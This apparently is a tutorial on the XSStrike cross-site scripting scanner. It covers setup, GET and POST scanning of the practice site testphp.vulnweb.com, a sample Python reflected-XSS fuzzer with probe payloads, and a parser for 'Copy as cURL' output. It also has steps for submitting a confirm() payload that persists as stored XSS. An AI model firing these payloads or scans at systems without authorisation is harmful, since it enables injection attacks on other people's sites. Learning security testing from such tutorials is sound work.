1. Introduction

XSStrike is a handy tool for finding cross-site scripting (XSS) in web applications; it is simple and easy to use.

Some main features:

  • Powerful fuzzing engine
  • Context breaking technology
  • Intelligent payload generation
  • GET & POST method support
  • Cookie Support
  • WAF Fingerprinting
  • Hand crafted payloads for filter and WAF evasion
  • Hidden parameter discovery
  • Accurate results via the Levenshtein distance algorithm

2. Setup

Follow the steps below to set it up:

  • Clone the Git repository: git clone https://github.com/UltimateHackers/XSStrike
  • Move into the code folder: cd XSStrike
  • Install the required packages: sudo pip install -r requirements.txt
  • Start xsstrike: python xsstrike

3. Testing with the GET Request

After starting xsstrike, enter a URL whose input is passed by the GET method (the parameter names are visible in the query string).

Example: https://www.test-domain.com/search?q=test

XSStrike will inject its list of XSS payloads into the q parameter (which currently holds the value test) and check how each one is reflected in the response.
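To make the mechanism concrete, here is an added example (written for this article, not XSStrike's own code) of what parameter fuzzing for reflected XSS does with a GET URL: each query parameter in turn is replaced by a payload, the page is fetched, and the response is checked for whether the payload comes back raw, HTML-encoded, or not at all. The URL https://www.test-domain.com/search?q=test&lang=en, the three payloads, and the fake_fetch stand-in for the target are all constructed for the example; in a real run you would pass requests.get instead of fake_fetch.

```python
"""Added example (not XSStrike's own code): parameter fuzzing for reflected XSS.

Each query parameter of a GET URL is replaced by a payload, the page is
fetched, and the response is classified by how the payload is reflected:
'raw' (returned unchanged, so the HTML context is broken and the browser
would execute it), 'encoded' (returned HTML-escaped, so the application
neutralised it) or 'none' (not reflected at all)."""
import html
from typing import Callable, Dict, List
from urllib.parse import parse_qsl, urlencode, urlsplit, urlunsplit

# A few classic probes; a real scanner generates many more and adapts them
# to the context in which the input is reflected.
PAYLOADS = [
    "<svg/onload=(confirm)()>",
    "\"><script>confirm(1)</script>",
    "'-confirm(1)-'",
]


def inject(url: str, param: str, payload: str) -> str:
    """Return url with the value of `param` replaced by `payload`;
    every other parameter is left untouched."""
    parts = urlsplit(url)
    query = parse_qsl(parts.query, keep_blank_values=True)
    if param not in {k for k, _ in query}:
        raise KeyError(param)
    new_query = [(k, payload if k == param else v) for k, v in query]
    return urlunsplit(parts._replace(query=urlencode(new_query)))


def classify(body: str, payload: str) -> str:
    """Classify how `payload` came back in the response body."""
    if payload in body:
        return "raw"
    if html.escape(payload, quote=True) in body or html.escape(payload, quote=False) in body:
        return "encoded"
    return "none"


def scan(url: str, fetch: Callable[[str], str]) -> Dict[str, Dict[str, str]]:
    """Try every payload in every query parameter and record the outcome.

    `fetch` is any callable returning the response body for a URL, e.g.
    lambda u: requests.get(u).text in a real run."""
    params = [k for k, _ in parse_qsl(urlsplit(url).query, keep_blank_values=True)]
    results: Dict[str, Dict[str, str]] = {}
    for param in params:
        results[param] = {}
        for payload in PAYLOADS:
            body = fetch(inject(url, param, payload))
            results[param][payload] = classify(body, payload)
    return results


def vulnerable_params(url: str, fetch: Callable[[str], str]) -> List[str]:
    """Parameters for which at least one payload was reflected raw."""
    return [p for p, r in scan(url, fetch).items() if "raw" in r.values()]


# Constructed stand-in for the target (no network needed): it echoes the
# q parameter back unescaped (vulnerable) and the lang parameter escaped (safe).
def fake_fetch(url: str) -> str:
    q = dict(parse_qsl(urlsplit(url).query, keep_blank_values=True))
    return (
        "<html><body><h1>Results for " + q.get("q", "") + "</h1>"
        "<p>lang=" + html.escape(q.get("lang", ""), quote=True) + "</p></body></html>"
    )


if __name__ == "__main__":
    target = "https://www.test-domain.com/search?q=test&lang=en"  # hypothetical URL
    for param, outcome in scan(target, fake_fetch).items():
        for payload, how in outcome.items():
            print(f"{param:5} {how:8} {payload}")
    print("vulnerable:", vulnerable_params(target, fake_fetch))
```

Against the constructed target this reports q as vulnerable (every payload reflected raw) and lang as safe (every payload reflected encoded). A scanner like XSStrike goes further, measuring how much of each payload survives and picking payloads that break out of the specific HTML, attribute or script context, but the reflection check above is the core of what it is doing to the parameter.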

4. More Examples & Screenshots

Example URL: http://testphp.vulnweb.com/listproducts.php?cat=1

5. Testing with the POST Method

URL of a form submitted with the POST method: http://testphp.vulnweb.com/guestbook.php

With the POST method the parameter names are not in the URL, so after the URL has been entered the tool shows a new prompt:

[?] Enter POST data: name=anonymous+user&text=test&submit=add+message

We can capture the POST data with the following steps:

  • Open the form: http://testphp.vulnweb.com/guestbook.php
  • Enter any value in the text box and click Submit
  • Right-click on the page, select "Inspect Element", then open the "Network" tab
  • Right-click on the POST request and select "Copy" > "Copy as cURL"

The copied cURL command should look like this:

curl 'http://testphp.vulnweb.com/guestbook.php' -H 'Host: testphp.vulnweb.com' -H 'User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.13; rv:58.0) Gecko/20100101 Firefox/58.0' -H 'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8' -H 'Accept-Language: en-US,en;q=0.5' --compressed -H 'Referer: http://testphp.vulnweb.com/guestbook.php' -H 'Content-Type: application/x-www-form-urlencoded' -H 'Connection: keep-alive' -H 'Upgrade-Insecure-Requests: 1' --data 'name=anonymous+user&text=test&submit=add+message'

The value you need is the argument of --data (name=anonymous+user&text=test&submit=add+message); paste it at the "Enter POST data" prompt. Each name=value pair in that string is a form field the tool will fuzz.
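For forms with many fields, or when repeating this for several pages, it is convenient to extract the body automatically. The following added example (written for this article, not part of XSStrike) parses a browser's "Copy as cURL" output, returns the URL, headers and POST body, and lists the form fields the body contains. The curl command is the one shown above, embedded as a constant so the script runs offline; it only understands the options a browser emits (-H, the --data family, and boolean flags such as --compressed).

```python
"""Added example (not part of the original post or of XSStrike): pull the
POST body out of a browser's "Copy as cURL" output so it can be pasted at
the "Enter POST data" prompt, and list the form fields it contains."""
import shlex
from typing import Dict, List, Tuple
from urllib.parse import parse_qsl

# The curl command copied from the browser for the guestbook form
# (embedded here so the example runs without a network connection).
CURL_COMMAND = (
    "curl 'http://testphp.vulnweb.com/guestbook.php' "
    "-H 'Host: testphp.vulnweb.com' "
    "-H 'User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.13; rv:58.0) "
    "Gecko/20100101 Firefox/58.0' "
    "-H 'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8' "
    "-H 'Accept-Language: en-US,en;q=0.5' --compressed "
    "-H 'Referer: http://testphp.vulnweb.com/guestbook.php' "
    "-H 'Content-Type: application/x-www-form-urlencoded' "
    "-H 'Connection: keep-alive' -H 'Upgrade-Insecure-Requests: 1' "
    "--data 'name=anonymous+user&text=test&submit=add+message'"
)

# Spellings of the body option that browsers and curl users commonly emit.
DATA_FLAGS = {"--data", "-d", "--data-raw", "--data-binary", "--data-urlencode"}


def parse_curl(command: str) -> Tuple[str, Dict[str, str], str]:
    """Return (url, headers, body) from a 'Copy as cURL' command line.

    Options that take a value (-H/--header and the --data family) consume
    the next token; any other option is treated as a boolean flag and
    skipped; the one bare token left is the URL."""
    tokens = shlex.split(command)
    if not tokens or tokens[0] != "curl":
        raise ValueError("not a curl command")
    url, headers, body = "", {}, ""
    i = 1
    while i < len(tokens):
        tok = tokens[i]
        if tok in ("-H", "--header"):
            name, _, value = tokens[i + 1].partition(":")
            headers[name.strip()] = value.strip()
            i += 2
        elif tok in DATA_FLAGS:
            body = tokens[i + 1]
            i += 2
        elif tok.startswith("-"):
            i += 1  # boolean flag such as --compressed
        else:
            url = tok
            i += 1
    if not url:
        raise ValueError("no URL in curl command")
    return url, headers, body


def form_fields(body: str) -> List[str]:
    """Names of the parameters in a urlencoded body, in order; these are
    the injection points a parameter fuzzer will work through."""
    return [name for name, _ in parse_qsl(body, keep_blank_values=True)]


def is_form_post(headers: Dict[str, str]) -> bool:
    """True when the body is a classic urlencoded form, which is what the
    name=value&name=value prompt expects; JSON or multipart bodies are not."""
    return headers.get("Content-Type", "").startswith("application/x-www-form-urlencoded")


if __name__ == "__main__":
    url, headers, body = parse_curl(CURL_COMMAND)
    print("URL:        ", url)
    print("POST data:  ", body)
    print("form fields:", form_fields(body))
    print("urlencoded: ", is_form_post(headers))
```

Two things worth checking in the parsed output before pasting: that the Content-Type is application/x-www-form-urlencoded (a JSON or multipart body cannot be expressed as name=value pairs), and whether the headers include a Cookie, since a form behind a login will only accept the request when the session cookie is sent along with it.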

In this run, XSStrike reported a payload with 100% efficiency, meaning the whole payload was reflected in the response unchanged: <svg/onload=(confirm)()>

We can verify it by copying this payload, pasting it into the text box and clicking the Submit button; the page should show a confirm() dialog. Note that the guestbook stores each entry, so the payload will fire again for anyone who views the page later (a stored XSS); only do this on a target you are allowed to test.

It is simple but really helpful for scanning and checking XSS issues with both the GET and the POST method.

Please do not hesitate to let me know if you have any questions or concerns, I’m happy to help!
